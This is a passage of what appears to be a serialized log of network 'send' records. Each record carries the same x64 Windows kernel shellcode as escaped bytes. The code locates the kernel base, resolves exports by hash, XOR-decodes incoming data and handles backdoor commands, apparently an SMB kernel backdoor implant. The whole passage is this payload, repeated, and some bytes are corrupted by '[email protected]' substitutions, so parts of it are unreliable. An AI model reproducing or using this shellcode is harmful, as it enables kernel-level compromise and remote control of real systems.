\xc3SeH\\\\x8b\\\\x04%8\\\\x00\\\\x00\\\\x00H\\\\[email\u00a0protected]\\\\x04H\\\\xc1\\\\xe8\\\\x0cH\\\\xc1\\\\xe0\\\\x0cH\\\\x8b\\\\x18f\\\\x81\\\\xfbMZt\\\\x08H-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xee[\\\\xc3WVQH1\\\\xffH\\\\x89\\\\xc6H1\\\\xc0\\\\x8b\\\\x04\\\\xbaH\\\\x01\\\\xf0\\\\[email\u00a0protected]\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x0eH\\\\xff\\\\xc7H9\\\\xdft\\\\x0b\\\\xeb\\\\xe4Y^_\\\\xc3H\\\\x89\\\\xf8\\\\xeb\\\\xf7H1\\\\xc0\\\\xeb\\\\xf2VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA\\\\x1cH\\\\x01\\\\xf0^\\\\xc3VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA 
H\\\\x01\\\\xf0^\\\\xc3VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA$H\\\\x01\\\\xf0^\\\\xc3H\\\\xd1\\\\xe1H\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3H\\\\x81\\\\xca\\\\x00\\\\x00\\\\xff\\\\xffH\\\\x81\\\\xf2\\\\x00\\\\x00\\\\xff\\\\xffH\\\\xc1\\\\xe2\\\\x02H\\\\x01\\\\xd1H1\\\\xd2\\\\x8b\\\\x11H\\\\x01\\\\xd0\\\\xc3WVSUATAUAVAWI\\\\x89\\\\xe4H\\\\x81\\\\xec\\\\x08\\\\x01\\\\x00\\\\x00I\\\\x89\\\\xcfH\\\\x8d-\\\\xe0\\\\xff\\\\xff\\\\xfff\\\\x81\\\\xe5\\\\x00\\\\xf0H\\\\x89MXH1\\\\xd2f\\\\x8bQ\\\\x02H\\\\x01\\\\xcaH;\\\\x11t\\\\x06H\\\\x8dI\\\\x08\\\\xeb\\\\xf5H\\\\x8dA(H\\\\x89E4H\\\\x8bA\\\\xf0H\\\\x89E(\\\\xe8(\\\\x01\\\\x00\\\\x00\\\\xe8{\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xed\\\\x00\\\\x00\\\\x00L\\\\x8bm<A\\\\x8bM\\\\xbc\\\\xe8\\\\xf9\\\\x00\\\\x00\\\\x00<#t\\\\r<wt\\\\x1d<\\\\xc8t#\\\\xe9\\\\xbd\\\\x00\\\\x00\\\\x00H\\\\x8bM(\\\\x8bED\\\\x89A\\\\x0e\\\\xb0\\\\x01\\\\x88A\\\\x12\\\\xe9\\\\xa5\\\\x00\\\\x00\\\\x00\\\\xe8\\\\xf4\\\\x00\\\\x00\\\\x00\\\\xe9\\\\x9b\\\\x00\\\\x00\\\\x00H1\\\\xdbH1\\\\xf6H1\\\\xffI\\\\x8bE\\\\xd8\\\\x8b\\\\x18\\\\x8bp\\\\x04\\\\x8bx\\\\x08\\\\x8bMH1\\\\xcb1\\\\xce1\\\\xcfA;u\\\\x10u{;]TH\\\\x8bELt\\\\x16\\\\xe8\\\\xd1\\\\x00\\\\x00\\\\x00H\\\\x8dS\\\\x04H1\\\\xc9\\\\xffU\\\\x10H\\\\x89EL\\\\x89]TH\\\\x85\\\\xc0t[H\\\\x01\\\\xf7H9\\\\xdfwOH)\\\\xf7H\\\\x01\\\\xc7WH\\\\x89\\\\xf1QI\\\\x8bu\\\\xe8\\\\xf3\\\\xa4YH\\\\xc1\\\\xe9\\\\x02^\\\\x8bUH1\\\\x16H\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf8H\\\\x01\\\\xd8H9\\\\xc6|!\\\\xffUL\\\\xe8\\\\x81\\\\x00\\\\x00\\\\x00\\\\x8bED\\\\xd1\\\\xe8H1\\\\xc9\\\\x88\\\\xc1H\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89ED\\\\xe8C\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 \\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00H\\\\x8bM(\\\\xb4\\\\x00f\\\\x01A\\\\x1eH\\\\x8bE 
L\\\\x89\\\\xf9L\\\\x89\\\\xe4A_A^A]A\\\\\\\\][^_\\\\xff`x1\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bED\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89EHY\\\\xc3Q\\\\xe8\\\\x0e\\\\x00\\\\x00\\\\x00H\\\\x8bE H\\\\x8bHxH\\\\x89HpY\\\\xc3SWH\\\\x83\\\\xec(H\\\\x8b]LH\\\\x85\\\\xdbt\\\\x131\\\\xc0H\\\\x89\\\\xdfH1\\\\xc9\\\\x8bMT\\\\xf3\\\\xaaH\\\\x89\\\\xd9\\\\xffU\\\\x18H1\\\\xc0\\\\x89ETH\\\\x89ELH\\\\x83\\\\xc4(_[\\\\xc3QVWH\\\\x8bu4H\\\\x8b\\\\x0e\\\\xe8H\\\\x00\\\\x00\\\\x00H\\\\x85\\\\xc0u\\\\x11H\\\\x8dv\\\\x08H\\\\x8b\\\\x0e\\\\xe87\\\\x00\\\\x00\\\\x00H\\\\x85\\\\xc0t+H\\\\x89M4j\\\\x0cXH\\\\x8d\\\\xb1\\\\x90\\\\x00\\\\x00\\\\x00;\\\\x06t\\\\x08H\\\\x83\\\\xc6\\\\x08;\\\\x06u\\\\x11;F\\\\x04u\\\\x0cH\\\\x89u<H1\\\\xc0H\\\\xff\\\\xc0\\\\xeb\\\\x03H1\\\\xc0_^Y\\\\xc3H1\\\\xc0H9\\\\xc1}\\\\x03H\\\\xff\\\\xc0\\\\xc3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('send', 8, b'\\\\x89\\\\xecA_A^A]A\\\\\\\\^_][\\\\xc3SRQUH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x00\\\\x01\\\\x00\\\\x00WH\\\\x89\\\\xcfH\\\\x89\\\\xd8H\\\\x89\\\\x85\\\\x00\\\\xff\\\\xff\\\\xff\\\\xe8\\\\xbb\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8H\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x10\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x9a\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x18\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x8f\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85 \\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x84\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85(\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xf9H\\\\x8b\\\\x95 
\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x9d\\\\x10\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x0f\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x850\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85(\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d0\\\\xff\\\\xff\\\\xff\\\\xe8U\\\\x01\\\\x00\\\\x00f\\\\x89\\\\xc2H\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x18\\\\xff\\\\xff\\\\xff\\\\xe8I\\\\x01\\\\x00\\\\x00_H\\\\x81\\\\xc4\\\\x00\\\\x01\\\\x00\\\\x00]YZ[\\\\xc3VWH1\\\\xf6\\\\x8bp<H\\\\x01\\\\xc6f\\\\x81>PEu\\\\x12H\\\\x81\\\\xc6\\\\x88\\\\x00\\\\x00\\\\x00H1\\\\xff\\\\x8b>H\\\\x01\\\\xf8_^\\\\xc3H1\\\\xc0\\\\xeb\\\\xf8VQWH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x07\\\\x01\\\\xc8H\\\\xff\\\\xc6\\\\xeb\\\\xe7_Y^\\\\xc3VWRH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0H\\\\xff\\\\xc6\\\\xe2\\\\xecZ_^\\\\xc3VQWH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\n\\\\x01\\\\xc8H\\\\xff\\\\xc6H\\\\xff\\\\xc6\\\\xeb\\\\xe4_Y^\\\\xc3VH\\\\x89\\\\xc6H\\\\x83\\\\xc6\\\\x18H1\\\\xc0\\\\x8b\\\\x06^\\\\xc3SeH\\\\x8b\\\\x04%8\\\\x00\\\\x00\\\\x00H\\\\[email\u00a0protected]\\\\x04H\\\\xc1\\\\xe8\\\\x0cH\\\\xc1\\\\xe0\\\\x0cH\\\\x8b\\\\x18f\\\\x81\\\\xfbMZt\\\\x08H-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xee[\\\\xc3WVQH1\\\\xffH\\\\x89\\\\xc6H1\\\\xc0\\\\x8b\\\\x04\\\\xbaH\\\\x01\\\\xf0\\\\[email\u00a0protected]\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x0eH\\\\xff\\\\xc7H9\\\\xdft\\\\x0b\\\\xeb\\\\xe4Y^_\\\\xc3H\\\\x89\\\\xf8\\\\xeb\\\\xf7H1\\\\xc0\\\\xeb\\\\xf2VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA\\\\x1cH\\\\x01\\\\xf0^\\\\xc3VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA 
H\\\\x01\\\\xf0^\\\\xc3VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA$H\\\\x01\\\\xf0^\\\\xc3H\\\\xd1\\\\xe1H\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3H\\\\x81\\\\xca\\\\x00\\\\x00\\\\xff\\\\xffH\\\\x81\\\\xf2\\\\x00\\\\x00\\\\xff\\\\xffH\\\\xc1\\\\xe2\\\\x02H\\\\x01\\\\xd1H1\\\\xd2\\\\x8b\\\\x11H\\\\x01\\\\xd0\\\\xc3WVSUATAUAVAWI\\\\x89\\\\xe4H\\\\x81\\\\xec\\\\x08\\\\x01\\\\x00\\\\x00I\\\\x89\\\\xcfH\\\\x8d-\\\\xe0\\\\xff\\\\xff\\\\xfff\\\\x81\\\\xe5\\\\x00\\\\xf0H\\\\x89MXH1\\\\xd2f\\\\x8bQ\\\\x02H\\\\x01\\\\xcaH;\\\\x11t\\\\x06H\\\\x8dI\\\\x08\\\\xeb\\\\xf5H\\\\x8dA(H\\\\x89E4H\\\\x8bA\\\\xf0H\\\\x89E(\\\\xe8(\\\\x01\\\\x00\\\\x00\\\\xe8{\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xed\\\\x00\\\\x00\\\\x00L\\\\x8bm<A\\\\x8bM\\\\xbc\\\\xe8\\\\xf9\\\\x00\\\\x00\\\\x00<#t\\\\r<wt\\\\x1d<\\\\xc8t#\\\\xe9\\\\xbd\\\\x00\\\\x00\\\\x00H\\\\x8bM(\\\\x8bED\\\\x89A\\\\x0e\\\\xb0\\\\x01\\\\x88A\\\\x12\\\\xe9\\\\xa5\\\\x00\\\\x00\\\\x00\\\\xe8\\\\xf4\\\\x00\\\\x00\\\\x00\\\\xe9\\\\x9b\\\\x00\\\\x00\\\\x00H1\\\\xdbH1\\\\xf6H1\\\\xffI\\\\x8bE\\\\xd8\\\\x8b\\\\x18\\\\x8bp\\\\x04\\\\x8bx\\\\x08\\\\x8bMH1\\\\xcb1\\\\xce1\\\\xcfA;u\\\\x10u{;]TH\\\\x8bELt\\\\x16\\\\xe8\\\\xd1\\\\x00\\\\x00\\\\x00H\\\\x8dS\\\\x04H1\\\\xc9\\\\xffU\\\\x10H\\\\x89EL\\\\x89]TH\\\\x85\\\\xc0t[H\\\\x01\\\\xf7H9\\\\xdfwOH)\\\\xf7H\\\\x01\\\\xc7WH\\\\x89\\\\xf1QI\\\\x8bu\\\\xe8\\\\xf3\\\\xa4YH\\\\xc1\\\\xe9\\\\x02^\\\\x8bUH1\\\\x16H\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf8H\\\\x01\\\\xd8H9\\\\xc6|!\\\\xffUL\\\\xe8\\\\x81\\\\x00\\\\x00\\\\x00\\\\x8bED\\\\xd1\\\\xe8H1\\\\xc9\\\\x88\\\\xc1H\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89ED\\\\xe8C\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 \\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00H\\\\x8bM(\\\\xb4\\\\x00f\\\\x01A\\\\x1eH\\\\x8bE 
L\\\\x89\\\\xf9L\\\\x89\\\\xe4A_A^A]A\\\\\\\\][^_\\\\xff`x1\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bED\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89EHY\\\\xc3Q\\\\xe8\\\\x0e\\\\x00\\\\x00\\\\x00H\\\\x8bE H\\\\x8bHxH\\\\x89HpY\\\\xc3SWH\\\\x83\\\\xec(H\\\\x8b]LH\\\\x85\\\\xdbt\\\\x131\\\\xc0H\\\\x89\\\\xdfH1\\\\xc9\\\\x8bMT\\\\xf3\\\\xaaH\\\\x89\\\\xd9\\\\xffU\\\\x18H1\\\\xc0\\\\x89ETH\\\\x89ELH\\\\x83\\\\xc4(_[\\\\xc3QVWH\\\\x8bu4H\\\\x8b\\\\x0e\\\\xe8H\\\\x00\\\\x00\\\\x00H\\\\x85\\\\xc0u\\\\x11H\\\\x8dv\\\\x08H\\\\x8b\\\\x0e\\\\xe87\\\\x00\\\\x00\\\\x00H\\\\x85\\\\xc0t+H\\\\x89M4j\\\\x0cXH\\\\x8d\\\\xb1\\\\x90\\\\x00\\\\x00\\\\x00;\\\\x06t\\\\x08H\\\\x83\\\\xc6\\\\x08;\\\\x06u\\\\x11;F\\\\x04u\\\\x0cH\\\\x89u<H1\\\\xc0H\\\\xff\\\\xc0\\\\xeb\\\\x03H1\\\\xc0_^Y\\\\xc3H1\\\\xc0H9\\\\xc1}\\\\x03H\\\\xff\\\\xc0\\\\xc3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('send', 9, b'\\\\x89\\\\xecA_A^A]A\\\\\\\\^_][\\\\xc3SRQUH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x00\\\\x01\\\\x00\\\\x00WH\\\\x89\\\\xcfH\\\\x89\\\\xd8H\\\\x89\\\\x85\\\\x00\\\\xff\\\\xff\\\\xff\\\\xe8\\\\xbb\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8H\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x10\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x9a\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x18\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x8f\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85 \\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x84\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85(\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xf9H\\\\x8b\\\\x95 
\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x9d\\\\x10\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x0f\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x850\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85(\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d0\\\\xff\\\\xff\\\\xff\\\\xe8U\\\\x01\\\\x00\\\\x00f\\\\x89\\\\xc2H\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x18\\\\xff\\\\xff\\\\xff\\\\xe8I\\\\x01\\\\x00\\\\x00_H\\\\x81\\\\xc4\\\\x00\\\\x01\\\\x00\\\\x00]YZ[\\\\xc3VWH1\\\\xf6\\\\x8bp<H\\\\x01\\\\xc6f\\\\x81>PEu\\\\x12H\\\\x81\\\\xc6\\\\x88\\\\x00\\\\x00\\\\x00H1\\\\xff\\\\x8b>H\\\\x01\\\\xf8_^\\\\xc3H1\\\\xc0\\\\xeb\\\\xf8VQWH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x07\\\\x01\\\\xc8H\\\\xff\\\\xc6\\\\xeb\\\\xe7_Y^\\\\xc3VWRH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0H\\\\xff\\\\xc6\\\\xe2\\\\xecZ_^\\\\xc3VQWH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\n\\\\x01\\\\xc8H\\\\xff\\\\xc6H\\\\xff\\\\xc6\\\\xeb\\\\xe4_Y^\\\\xc3VH\\\\x89\\\\xc6H\\\\x83\\\\xc6\\\\x18H1\\\\xc0\\\\x8b\\\\x06^\\\\xc3SeH\\\\x8b\\\\x04%8\\\\x00\\\\x00\\\\x00H\\\\[email\u00a0protected]\\\\x04H\\\\xc1\\\\xe8\\\\x0cH\\\\xc1\\\\xe0\\\\x0cH\\\\x8b\\\\x18f\\\\x81\\\\xfbMZt\\\\x08H-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xee[\\\\xc3WVQH1\\\\xffH\\\\x89\\\\xc6H1\\\\xc0\\\\x8b\\\\x04\\\\xbaH\\\\x01\\\\xf0\\\\[email\u00a0protected]\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x0eH\\\\xff\\\\xc7H9\\\\xdft\\\\x0b\\\\xeb\\\\xe4Y^_\\\\xc3H\\\\x89\\\\xf8\\\\xeb\\\\xf7H1\\\\xc0\\\\xeb\\\\xf2VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA\\\\x1cH\\\\x01\\\\xf0^\\\\xc3VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA 
H\\\\x01\\\\xf0^\\\\xc3VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA$H\\\\x01\\\\xf0^\\\\xc3H\\\\xd1\\\\xe1H\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3H\\\\x81\\\\xca\\\\x00\\\\x00\\\\xff\\\\xffH\\\\x81\\\\xf2\\\\x00\\\\x00\\\\xff\\\\xffH\\\\xc1\\\\xe2\\\\x02H\\\\x01\\\\xd1H1\\\\xd2\\\\x8b\\\\x11H\\\\x01\\\\xd0\\\\xc3WVSUATAUAVAWI\\\\x89\\\\xe4H\\\\x81\\\\xec\\\\x08\\\\x01\\\\x00\\\\x00I\\\\x89\\\\xcfH\\\\x8d-\\\\xe0\\\\xff\\\\xff\\\\xfff\\\\x81\\\\xe5\\\\x00\\\\xf0H\\\\x89MXH1\\\\xd2f\\\\x8bQ\\\\x02H\\\\x01\\\\xcaH;\\\\x11t\\\\x06H\\\\x8dI\\\\x08\\\\xeb\\\\xf5H\\\\x8dA(H\\\\x89E4H\\\\x8bA\\\\xf0H\\\\x89E(\\\\xe8(\\\\x01\\\\x00\\\\x00\\\\xe8{\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xed\\\\x00\\\\x00\\\\x00L\\\\x8bm<A\\\\x8bM\\\\xbc\\\\xe8\\\\xf9\\\\x00\\\\x00\\\\x00<#t\\\\r<wt\\\\x1d<\\\\xc8t#\\\\xe9\\\\xbd\\\\x00\\\\x00\\\\x00H\\\\x8bM(\\\\x8bED\\\\x89A\\\\x0e\\\\xb0\\\\x01\\\\x88A\\\\x12\\\\xe9\\\\xa5\\\\x00\\\\x00\\\\x00\\\\xe8\\\\xf4\\\\x00\\\\x00\\\\x00\\\\xe9\\\\x9b\\\\x00\\\\x00\\\\x00H1\\\\xdbH1\\\\xf6H1\\\\xffI\\\\x8bE\\\\xd8\\\\x8b\\\\x18\\\\x8bp\\\\x04\\\\x8bx\\\\x08\\\\x8bMH1\\\\xcb1\\\\xce1\\\\xcfA;u\\\\x10u{;]TH\\\\x8bELt\\\\x16\\\\xe8\\\\xd1\\\\x00\\\\x00\\\\x00H\\\\x8dS\\\\x04H1\\\\xc9\\\\xffU\\\\x10H\\\\x89EL\\\\x89]TH\\\\x85\\\\xc0t[H\\\\x01\\\\xf7H9\\\\xdfwOH)\\\\xf7H\\\\x01\\\\xc7WH\\\\x89\\\\xf1QI\\\\x8bu\\\\xe8\\\\xf3\\\\xa4YH\\\\xc1\\\\xe9\\\\x02^\\\\x8bUH1\\\\x16H\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf8H\\\\x01\\\\xd8H9\\\\xc6|!\\\\xffUL\\\\xe8\\\\x81\\\\x00\\\\x00\\\\x00\\\\x8bED\\\\xd1\\\\xe8H1\\\\xc9\\\\x88\\\\xc1H\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89ED\\\\xe8C\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 \\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00H\\\\x8bM(\\\\xb4\\\\x00f\\\\x01A\\\\x1eH\\\\x8bE 
L\\\\x89\\\\xf9L\\\\x89\\\\xe4A_A^A]A\\\\\\\\][^_\\\\xff`x1\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bED\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89EHY\\\\xc3Q\\\\xe8\\\\x0e\\\\x00\\\\x00\\\\x00H\\\\x8bE H\\\\x8bHxH\\\\x89HpY\\\\xc3SWH\\\\x83\\\\xec(H\\\\x8b]LH\\\\x85\\\\xdbt\\\\x131\\\\xc0H\\\\x89\\\\xdfH1\\\\xc9\\\\x8bMT\\\\xf3\\\\xaaH\\\\x89\\\\xd9\\\\xffU\\\\x18H1\\\\xc0\\\\x89ETH\\\\x89ELH\\\\x83\\\\xc4(_[\\\\xc3QVWH\\\\x8bu4H\\\\x8b\\\\x0e\\\\xe8H\\\\x00\\\\x00\\\\x00H\\\\x85\\\\xc0u\\\\x11H\\\\x8dv\\\\x08H\\\\x8b\\\\x0e\\\\xe87\\\\x00\\\\x00\\\\x00H\\\\x85\\\\xc0t+H\\\\x89M4j\\\\x0cXH\\\\x8d\\\\xb1\\\\x90\\\\x00\\\\x00\\\\x00;\\\\x06t\\\\x08H\\\\x83\\\\xc6\\\\x08;\\\\x06u\\\\x11;F\\\\x04u\\\\x0cH\\\\x89u<H1\\\\xc0H\\\\xff\\\\xc0\\\\xeb\\\\x03H1\\\\xc0_^Y\\\\xc3H1\\\\xc0H9\\\\xc1}\\\\x03H\\\\xff\\\\xc0\\\\xc3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('send', 10, b'\\\\x89\\\\xecA_A^A]A\\\\\\\\^_][\\\\xc3SRQUH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x00\\\\x01\\\\x00\\\\x00WH\\\\x89\\\\xcfH\\\\x89\\\\xd8H\\\\x89\\\\x85\\\\x00\\\\xff\\\\xff\\\\xff\\\\xe8\\\\xbb\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8H\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x10\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x9a\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x18\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x8f\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85 \\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x84\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85(\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xf9H\\\\x8b\\\\x95 
\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x9d\\\\x10\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x0f\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x850\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85(\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d0\\\\xff\\\\xff\\\\xff\\\\xe8U\\\\x01\\\\x00\\\\x00f\\\\x89\\\\xc2H\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x18\\\\xff\\\\xff\\\\xff\\\\xe8I\\\\x01\\\\x00\\\\x00_H\\\\x81\\\\xc4\\\\x00\\\\x01\\\\x00\\\\x00]YZ[\\\\xc3VWH1\\\\xf6\\\\x8bp<H\\\\x01\\\\xc6f\\\\x81>PEu\\\\x12H\\\\x81\\\\xc6\\\\x88\\\\x00\\\\x00\\\\x00H1\\\\xff\\\\x8b>H\\\\x01\\\\xf8_^\\\\xc3H1\\\\xc0\\\\xeb\\\\xf8VQWH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x07\\\\x01\\\\xc8H\\\\xff\\\\xc6\\\\xeb\\\\xe7_Y^\\\\xc3VWRH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0H\\\\xff\\\\xc6\\\\xe2\\\\xecZ_^\\\\xc3VQWH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\n\\\\x01\\\\xc8H\\\\xff\\\\xc6H\\\\xff\\\\xc6\\\\xeb\\\\xe4_Y^\\\\xc3VH\\\\x89\\\\xc6H\\\\x83\\\\xc6\\\\x18H1\\\\xc0\\\\x8b\\\\x06^\\\\xc3SeH\\\\x8b\\\\x04%8\\\\x00\\\\x00\\\\x00H\\\\[email\u00a0protected]\\\\x04H\\\\xc1\\\\xe8\\\\x0cH\\\\xc1\\\\x